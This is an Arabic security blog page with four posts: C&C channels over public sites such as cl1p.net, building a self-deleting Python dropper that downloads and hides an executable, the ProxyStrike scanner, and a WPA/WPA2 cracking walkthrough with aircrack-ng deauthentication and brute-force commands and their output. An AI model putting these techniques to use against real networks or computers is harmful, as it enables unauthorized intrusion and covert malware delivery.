Hacker Hero






تحليل : كيف يقوم الهاكرز بإستغلال المواقع المعروفة للتحكم بالأجهزة المخترقه وبإستخدام Python



في هذا المقال سوف نتعرف على طريقة عمل البرمجيه Hammertoss , ونوضح مفهوم C&C server مع اعطاء مثال عملي باستخدام لغة البرمجه بايثون .
هامرتوس هي برمجيه روسيه من ضمن أذكي البرمجيات الخبيثه التي قد تراها بسبب الطريقه اللي يعمل بها فهو علي عكس معظم البرمجيات اللي تستخدم C&C server فهي لا تتصل بـسيرفر بها بشكل مباشر ولكن تستخدم عده مواقع معروفه مثل Github وTwitter للتواصل مع مطورين البرمجيه وبهذه الطريقه تتخطى كل الحمايات ويصعب تعقبها  !
ولعدم الغوض في تفاصيل البرمجيه ,هذا فيديو لشركه FireEye تشرح الطريقه التي تعمل بها البرمجيه من هنا

الأن كما أتضح من الفيديو فأول ما تقوم به البرمجيه هو البحث في تويتر عن تغريده وضعها أصحاب البرمجيه والتي تحتوي علي علي رابط وهاش تاج كجزء من التشفيره ولكن ألم تسأل نفسك كيف يبحث في تويتر ؟
الأجابه  وهي أنك لكي ترى تغريدات شخصا ما لا يلزم أن تكون قد قمت بتسجيل الدخول الي حسابك وهذا ما أعتمدت عليه البرمجيه !
ولكن ليس فقط التغريدات بل معلوماتك أيضا فقد قمت مثلا ببرمجه سكربت من قبل لجلب معلومات أي مستخدم تويتر تستطيع أن تراه من هنا وللقرائه أكثر عن هذه البرمجيه من هنا

المثال السابق كان فقط لأيضاح كيف تقوم البرمجيات بأستخدام المواقع الشهيره كسيرفر C&C , والأن وبشكل سريع ماهو C&C Server ؟
C&C هو أختصار Command and Control وهو يكون كالوسيط مابين المخترق والجهاز المخترق ويستخدم في الغالب في الـBotnets فهو يكون السيرفر الذي ينفذ المخترق الأوامر من عليه
الأن سأقوم بشرح أستخدام موقع معروف أخر لتكتمل الفكره وهو موقع Cl1p

هذا الموقع يسمح لك أن تألف أي كلمه مميزه وتستخدمها في في رابط خاص به وعندك دخولك عليه تستطيع أن تكتب أي شئ وتقوم بحفظه وتبعث هذا الرابط لأي أحد أخر فعندما يفتحه يري ما كتبته في اللينك ثم يمسح مما يعني أن تستطيع أن تستخدمه نفس الكلمه مره أخري و هكذا.
الأن سأوضح كيف من الممكن أستخدام هذا الموقع كا C&C Server بلغه البايثون ( أصدار 3 )
أول شئ سأقوم بعمل داله وظيفتها توليد أسم عشوائي ليتم أستخدامه في الرابط وسيكون طول الكلمه 30 رمز

للأيضاح فقد قمت أولا بعمل متغير فارغ ومن ثم قمت بعمل حلقه أو Loop عن طريق For تقوم بأختيار رمز واحد عشوائيا من كل الحروف الأبجديه والأرقام ومن ثم تضيفه للمتغير حتي يصبح طوله 30 رمز وتنتهي
الأن نبدأ بفرز الموقع لنري كيف نستحدمه ولنفرض مثلا أن الكلمه العشوائيه هي Isecur1ty  فيكون الرابط https://cl1p.net/Isecur1ty وعندما تفتحه تري الأتي :

من الواضح ان هذه فورم بسيطه تقوم بعمل بعمل طلب من نوع POST وترسله الي نفس الرابط وهذا ما يتضح عند النظر في الكود المصدري للصفحه

الأن النص الذي نكتبه يكون في الصندوق النصي النصي المسمي Content والذي محتواه يرسل في الطلب ولنقوم بأرسال طلب بنفس الطريقه في لغه البايثون سنستخدم مكتبه requests فيكون الكود الأتي :

فبعد تنفيذ الكود نفتح الرابط فنجد النتيجه :

كما نري فقد تم عرض النص مما يعني أن الكود أشتغل
والأن لنكتب كود أخر ليجلب النص من الصفحه وسأستخدم فيه مكتبه re مع مكتبه requests

فتكون النتيجه :

الأن لنصعب الأمر قليلا :]
الأن سأقوم بتقسيم النص الي عده أجزاء فيكون كل جزء منهم عباره عن كلمه وكل كلمه نضعها في رابط وحدها ونقوم بترميزها علي شكل Base64 حتي نتفادي الأخطاء التي التي قد تحدث عند أرسال نص وبه فصله أو ما شابه
ولعمل هذا سنقوم بعمل دالتين داله خاصه بالأرسال وداله للأستقبال ولكن كيف سنقوم بربط الكلمات ببعضها وكل كلمه في رابط بمفردها ؟
الحل بسيط وهو أن نأتي بالكلمه العشوائيه التي سنستخدمها في الرابط ونقوم بأضافه رقم عليها مع كل كلمه في رابط فمثلا النص “Test1 Test2 Test3” يقسم كالأتي

فتكون الدوال بالشكل الأتي :

فلنبسط الأمور قليلا
داله rand شرحت من قبل
داله send اول شئ قمت به هو تقسيم النص الي كلمات في المتغير msgs وبعدها المتغير word وهو الكلمه العشوائيه التي سنستخدمها ومن ثم يوجد المتغير n والذي سنستخدمه في العد وسأخبركم لماذا بعد قليل والأن قمت بعمل حلقه تأخذ كل كلمه فتضيف للمتغير word المتغير n ومن ثم تضيف المتغير word بعد الاضافه للرابط في المتغير link ومن ثم الأن نرسل طلب كما شرحنا من قبل ولكن هذه المره نقوم بترميز الكلمه التي سنرسلها بترميز base64 ونضيف 1 الي المتغير n وفي النهايه بعد أنتهاء الحلقه نقوم بطباعه المتغير n علي أنه هو المفتاح وستعرفون لماذا في داله الأستقبال
الأن داله receive قمنا فيها بأخذ متغيرين وهما word و key فالمتغير الأول سيكون الكلمه التي أستخدمت في الرابط والمتغير الثاني key سيعرفنا عدد الروابط  وبعدها نقوم بتجهيز الريجيكس الذي سنستخرج به النص ( للفهم أكثر أقرأ عن الـRegluar expressions ) والأن نقوم بعمل حلقه ومداها المتغير key ومن ثم نقم بنفس الخطوات كما شرحنا من قبل حتي نقوم في النهايه بطباعه النص كلمه كلمه وكل كلمه منفصله عن الأخري بمسافه
هذا كان شرح بسيط للأمر والسكربت يحتاج الكثير من التطوير ولكنك الأن تستطيع أن تخزن رساله سريه مثلا علي الموقع ومن ثم لا يستطيع أحد ومعه السكربت أن يقرأها الا لو معه الكلمه والمفتاح ^_^
ولقد قمت بتطوير هذا السكربت فجعلته سكربت لأرسال واستقبال الرسائل بسريه تستطيع أن تري الكود الكامل من هنا
والأن كما تري فقد يقوم الهاكر بأستغلال الموقع عبر أرسال أوامر عليه ويقوم الجهاز المخترق بقرائتها وتنفيذها ولكن قد يخطر علي بالك كيف سيعرف الجهاز المخترق بالكلمه والمفتاح حتي يقرأها ؟
بالنسبه للكلمه قد تكون كلمه محدده وليست كلمه عشوائيه ويقوم الجهاز المخترق بتفقد الرابط كل فتره زمنيه حتي يقوم الهاكر بكتابه أمر فيه وبالنسبه للمفتاح فمن الممكن أن يقوم الهاكر بأستخدام مفتاح ثابت دائما
,والي هنا انتهي من المقال  أرجوا أن تكون قد نال أعجابكم

إقرأ المزيد
 

ماهي البرمجيه الخبيثه Dropper وكيف تبرمج بلغه البايثون مع نظره علي أداه Dr0p1t




وصلنا لمرحله أننا أصبحنا كل يوم نري تطور البرمجيات خبيثه  أكثر وأكثر واليوم بأذن الله سنتحدث عن شكل من أشكالها وهي ليست برمجيه جديده ولكنها ليست معروفه للجميع ايضا وهي الـDropper

ماهو الـTrojan Dropper ؟

هو نوع من البرمجيات الخبيثه والذي تتكمن وظيفته في أن يقوم بتحميل ملف خبيث علي جهازك وتشغيله دون أن تشعر بشئ .
ولكي يقوم هذا الدروبر بهذا فأنه يفعل بذلك بطريقه من أثنين ليتخطي برامج الحمايه وهي أنه أما يكون يحتوي بالفعل علي كود الفايروس ويقوم بأنشائه وتشغيله مباشرتاً وهي عمليه من مرحله واحده..
الطريقه الثانيه وهي الشائعه بين هذه البرمجيات وهي أن يقوم بتحميل الملف الخبيث من علي الأنترنت بحيث يكون مبرمج الدروبر قد رفع الملف الخبيث مسبقا علي موقع من مواقع التخزين الألكتروني وبرمج الدروبر علي أن يحمله ومن ثم يقوم بتشغيله وكما نري هي عمليه من مرحلتين.
وفي الغالب يقوم الدروبر بمسح نفسه بعد أنجاز المهمه .

مثال :

في سنه 2014 أكتشف فريق f-secure برمجيه OnionDuke والتي كانت تنتشر في أجهزه مستخدمين شبكه الـTOR !
هذه البرمجيه تتكون من ملفين الملف الأول عباره عن دروبر وهو الملف الأساسي المستخدم للأنتشار حيث قام مؤلفين هذه البرمجيه بتجهيز بربط جهاز مجهز لنشر الدروبر وربطه بالشبكه حتي يكون بمثابه TOR Node (تستطيع القرائه أكثر عن كيفيه عمل شبكه الـTOR أو الأنتظار مقالنا عنها قريبا  ) ولكن هنا لن يكون مجرد TOR Node عاديه فعندما يقوم أحد مستخدمين الشبكه بتحميل ملف من علي شبكه التور والبيانات تمر من خلال هذه العقده , يحقن الدروبر في الملف بشكل تلقائي وبعدما يقوم المستخدم بتشغيل الملف يبدأ الدروبر بالعمل ويكون الملف الأساسي للبرمجيه الخبيثه للسيطره علي الجهاز وتقوم برامج الحمايه بتصنيف هذا الدروبر كا Trojan-Dropper:W32/OnionDuke.A .
الملف الثاني هو عباره عن ملف DLL يكون بداخل الدروبر والذي يكون في ظاهره صوره GIF لكنه في الواقع ملف DLL فيقوم الدروبر بتشغيل هذا الملف وعندما يعمل الملف يقوم بالأتصال بسيرفر الـC&C في أنتظار مؤلفين البرمجيه ( أو المتحكمين في السيرفر بشكل عام ) بأن يقوموا بتنفيذ أوامر علي الجهاز من تنزيل برمجيات خبيثه أخري وتثبيتها وما الي ذلك وتقوم برامج الحمايه بتصنيف هذا الملف كا Backdoor:W32/OnionDuke .
قمنا من قبل بالكتابه عن الـC&C Servers تستطيع أن تقرأ عنها من هنا 

والأن سنري كيف يمكن برمجه Dropper بلغه البايثون :

سنقوم ببرمجه دروبر من النوع الثاني الذي يقوم بتحميل الملفات الخبيثه الأخري من علي الأنترنت حيث أنه الأكثر شيوعا.
اولا من أجل تنزيل الملف سأستخدم داله urlretrieve من مكتبه urllib وسنستهدف بيئه عمل نظام الويندوز في شرحنا .
أذا كنت علي بايثون أصدار 2 فتقوم بعمل استيراد للداله هكذا

وأذا كنت علي بايثون أصدار 3 فتقوم بعمل أستيراد للداله هكذا

الأن هذه الداله تأخذ متغيرين واحد هو الرابط والأخر الأسم وسنجعل هنا أسم الملف ثابت وسيكون hosts.exe ولذلك سوف نعبر عن الأمر كالأتي :

الأن قمنا بتحميل الملف ولكن قبل تشغيله سنقوم بأخفائه ولعمل هذا سنستعين بمكتبه subprocess فنقوم بأستدعائها :

والأن ننفذ أمر attrib بسيط لأخفاء الملف ولكن سنوجه المُخرج الي البايب حتي لا يكون هناك أي أخراج

الأن فقط نستطيع تشغيل الملف كالأتي :

الأن أصبح لدينا دروبر بسيط يقوم بتحميل ملف وأخفائه وتشغيله ولكن يظل ينقصه بعض اللمسات مثل أن يقوم بمسح نفسه بعد الأنتهاء من المهمه فكيف نقوم بذلك ؟
لتكتب كود يجعل السكربت يمسح نفسه يعتبر من الأشياء الشبه مستحيله في البايثون ولذلك سنستعين بلغه batchfile لنقوم بعمل ملف bat يمسح السكربت ومن ثم يمسح نفسه
سيكون الكود الذي سيكون في الملف الـBat كالأتي :

الأن لنشرحه سطر سطر :
السطر الأول @echo off وهي أساسيه عند بدء كتابه أي ملف بات حتي لا يقوم الملف بعمل أوت بوت أو أخراج بمعني أخر
السطر الثاني نقوم به بأستخدام الأمر TASKKILL لعمل قتل للدروبر مع أستخدام سويتش /F لأجباره علي قتله وسويتش /IM لأنني سأعطيه أسم الملف الدروبر وليس الـPID ومن ثم بعدها نكتب أسم الدروبر
السطر الثالث نمسح الدروبر نفسه مع أستخدام سويتش -f لأجبار الملف علي مسحه
السطر الرابع نجعل ملف البات يقرأ أسمه ومن ثم يمسح نفسه وهذه الخدعه هي أننا جعلناه يقرأ أسمه عن طريق الـCommandline Argument رقم 0 والذي هو أسم الملف
الأن بعدما شرحنا الملف الم تلاحظ شيئا ما ؟
كيف سنعرف أسم الدروبر لنعطيه لملف البات ليقوم بمسحه ؟ فمن المحتمل أن يتغير أسم الدروبر الي أسم اخر غير الذين سميناه أياه !
الخدعه أننا سنجعل الدروبر يستطيع أن يقرأ أسمه وهذا ينفذ ببساطه عن طريق مكتبه sys فنقوم أولا بأستدعائها :

والأن سنستخدم داله executable من المكتبه لنعرف أسم الملف ولكنه سيكون المسار الكامل ولذلك سنقوم بعمل فرز له ونأتي بأسم الملف فقط من المسار

وبعدها نقوم بتشغيله فتصبح الأن داله التدمير الذاتي كالأتي

وهكذا الأن نكون قد شرحنا برمجه دروبر بسيط خاص بنا ولكن هل سمعت عن أداه Dr0p1t ؟؟
أداه Dr0p1t هي أداه جديده تقوم بعمل دروبر خاص بك ولكنه ليس بمثل بساطه الذي قمنا بشرحه الأن فهي بها بعض المزايا والتي هي عباره عن المهام التي تستطيع القيام بها قبل تشغيل الملف الخاص بك وبعده مثل جعله يعمل مع تشغيل الجهاز أو قتل الأنتي فايروس المثبت علي الجهاز.
تستطيع أن تقرأ عنه أكثر من الرابط الخاص به : https://github.com/D4Vinci/Dr0p1t-Framework

وهذه بعض الصور له من علي Github :


دمتم بود والسلام عليكم ورحمه الله
إقرأ المزيد
 

مقال : شرح أداة ProxyStrike v2.1



دائماً عند القيام بالـ pentests نحتاج إلى أدوات مساعدة لتساعدنا على أنجاز عملنا بشكل سهل وعملي أكثر, وطبعاً من الصعب أن تقوم بعمل كل شيء يدوي فهذا أهدار للوقت بدون فائدة, وأيضاً شيء مُمل أن تقوم ببرمجة كل أداة تحتاجها من جديد وهناك أدوات جاهزة, مجانية ومفتوحة المصدر, ويمكنك التعديل عليها حسب الحاجة و الرغبة, سوف نتحدث اليوم عن أداة ProxyStrike v2.1 فكرة وفائدة الأداة, أسلوب العمل, تشغيلها, متطلبتها و تحميلها.

فكرة الأداة: لنفرض أنك قمت بعمل تطبيق ويب أو تملك تطبيق ويب وتريد أن تفوم بفحص (عملية pentest) هذا التطبيق أمنياً من ناحية XSS و SQL Injection, اذاً هذه الأداة هية متطلبك, بالطبع هناك الكثير من الأدوات تقوم بهذا العمل وعلى سبيل المثال لا الحصر أداة RatProxy من Google  ولكن لكل أداة مميزات و عيوب! .. للعلم أن الأداة في الوقت الحالي تحتوي على موديلين للـ XSS و SQL Injection والموديلين تم تصميمهم على كشف معضم أو أغلب أخطاء/ثغرات XSS و SQL Injection.
موديل SQL Injection تم عملة بالـ Python, أما موديل XSS تم عملة بمكتبة Gazpacho
أسلوب عمل الأداة: بكل بساطة هية لا تختلف عن بقية الأدوات التي تعمل هذه المهمة فهية في النهاية Proxy أي سوف نعمل على المتصفح, نقوم بتشغيل الأداة على شكل Passive Proxy ونضبطها للتنصت على المنفذ 8008 (بشكل أفتراضي هو كذالك), وأيضاً لا تنسى أن تضبط المتصفح على أن يستخدم ProxyStrike على أنها الـ Proxy, وبعد هذا عليك أن تتصفح التطبيق (الموقع) والعمل علية, وفي هذه الأثناء سوف تقوم الأداة بعمل analyze أو تحليل للتطبيق (الموقع) وتتم هذه العملية على شكل background mode
” العمل على شكل background mode هوة أفضل بكثير, أنت لن ترى أي أختلاف ملحوظ ولكن في الكواليس هو يعمل بشكل نشط”
مميزات الأداة:
  • Plugin engine – Create your own plugins
  • Request interceptor
  • Request diffing
  • Request repeater
  • Automatic crawl process
  • Save/restore session
  • Http request/response history
  • Request parameter stats
  • Request parameter values stats
  • Request url parameter signing and header field signing
  • Use of an alternate proxy
  • Sql attacks
  • Server Side Includes
  • Xss attacks
  • Attack logs
  • Export results to HTML or XML
تدعم أنظمة التشغيل:
  • نظام لينكس Linux
  • نظام ويندوز Windows
متطلبات التشغيل:
مصدر التطبيق:
  • اضغط هنا لرؤية مصدر التطبيق
وأخيراً لتحميل الأداة من (google code) نسخة تنفيذية Executable
  • لتحميل النسخة الخاصة بنظام Linux – اضغط هنا
  • لتحميل النسخة الخاصة بنظام Windows – اضغط هنا



إقرأ المزيد
 

مقال : كسر تشفير شبكة الوايرلس WPA/WPA2 – PSK



شرح كيفية فك تشفير شبكات الوايرلس التي تستخدم تشفير WPA/WPA2-PSK عن طريق عمل هجوم Brute force لاستخراج مفتاح الشبكة باسخدام مجموعة Aricrack-ng.

معلومات يجب أن تعرفها:

Wifi
  1. هذا المقال يشرح كيفية فك تشفير الشبكات التي تستخدم برورتوكول WPA/WPA2-PSK لذلك كن متاكدا من الشبكة المستهدفة تستخدم هذا البرورتوكول.
  2. نستخدم هجوم brute force لفك تشفير WPA/WPA2-PSK لأن المفتاح ليس ثابتا لذلك فان جمع الـ IV’S كانك تريد فك تشفير WEP لن ينفع وانما ما ينفع هنا هو الـ handshake بين الكلاينت والاكسس بوينت AP.
  3. يجب أن تعلم أيضا أن المفتاح الذي تريد تخمينه يمكن ان يكون طوله بين 8 و 63 من أرقام وحروف وحتى الرموز الخاصة.
  4. يستطيع الحاسوب تجريب ما بين 50 و 300 مفتاح في الثانية اعتمادا على سرعة المعالج وقوة الاشارة وقد يدوم الأمر لساعات ان لم يدم لأيام أو شهور. واذا كنت تريد عمل قاموس به جميع الاحتمالات من أرقام ورموز وحروف كبيرة وصغيرة فاعلم انه اذا كانت هناك شبكة تستخدم مفتاح يتكون من 5 خانات (ارقام – رموز – حروف كبيرة – حروف صغيرة ) واذا كان جهازك يستطيع تجريب 1000 كلمة في الثانية فان الزمن اللازم لتجريب كل الاحتمالات هو 4 شهور.
سأستخدم نظام لينوكس وحزمة Aircrack-ng. وأنبه ﻷن المقال للاغراض العلمية فقط.

قبل البدء بعملية الكسر – BEFORE THE CRACKING:

يجب ان يكون كرت الوايرلس الذي تستخدمه يدعم الحقن او الـ injection ولمعرفة ذلك استخدم الامر التالي :
aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan0
9- تعني اختبار الحقن.
e- اسم الاكسس بوينت AP.
a- العنوان الفيزيائي للشبكة Mac adress.
wlan0 كرت الوايرلس
الناتج سيكون كالاتي:
11:01:06 ath0 channel: 9 11:01:06 Trying broadcast probe requests…
11:01:06 Injection is working!
11:01:07 Found 1 APs 11:01:07 Trying directed probe requests…
11:01:07 00:14:6C:7E:40:80 – channel: 9 – ‘JONA’
11:01:07 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
11:01:07 30/30: 100%
وأهم سطرين هما الثالث والاخير وهنا القيمة في السطر الاخير هي %100 وهذا يعني ان بامكاننا عمل injection للشبكة.
يجب ان تكون قريب كفاية من الشبكة المستهدفة لكي تستطيع ارسال الباكيت لها وتذكر ان اشارة الاكسس بوينت اقوى من اشارة كرت الوايرلس لديك وهذا يعني انك اذا كنت تستطيع استقبال الباكيت من الاكسس بوينت فذلك لا يعني انك تستطيع ارسال الباكيت.

الخطوات التي سنقوم بتنفيذها – CRACKING STEPS:

  1. وضع كرت الوايرلس في الوضع monitor وفي نفس القناة التي تستخدمها الاكسس بوينت.
  2. airodump-ng للحصول على الـ authentication handshake .
  3. aireplay-ng لفصل الكلاينت عن الشبكة.
  4. aircrack-ng لفك تشفير الـ PSK باستخدام الـ handshake.

عملية كسر تشفير شبكة الوايرلس – CRACKING:

نبدأ العملية بوضع كرت الوايرلس بالوضع monitor بتنفيذ الأمر التالي:
airmon-ng start wlan0 9
wlan0: كرت الوايرلس
9: القناة التي تستخدمها الاكسس بوينت
airodump-ng -c 9 –bssid 00:de:af:da:c7:00 -w psk wlan0
c- القناة التي تستخدمها الاكسس بوينت.
bssid– العنوان الفيزيائي للشبكة Mac adress.
w- اسم الملف الذي ستخزن به الباكيت او الحروف التي ستضاف لاسماء الباكيت للتمييز بينها.
أهم شيء هنا هو الـ handshake وسيظهر في أعلى يمين الشاشة . ويجب ان يكون جهاز متصل بالشبكة كلاينت.
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0
0- تعني deauthentication 1 هي عدد الـ deauthentication التي سيتم ارسالها
a- هي العنوان الفيزيائي للاكسس بوينت mac adress.
c- العنوان الفيزيائي للكلاينت الذي سيتم فصله.
والناتج تقريبا كالاتي:
11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]
نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة:
aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap
-w ملف المفاتيح الذي سيتم اختبارها
psk الاسم الذي اخترناه في الخطوة الاولى للباكيت.
والناتج سيكون كالاتي:
Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s)KEY FOUND! [ 123456 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
واخيرا فان فك تشفير بروتوكول WPA-PSK مستحيل اذا كان المفتاح يتكون من اكثر من 20 خانة.
وأنبه مرة اخرى على ان الشرح للاغراض العلمية … JoNa
إقرأ المزيد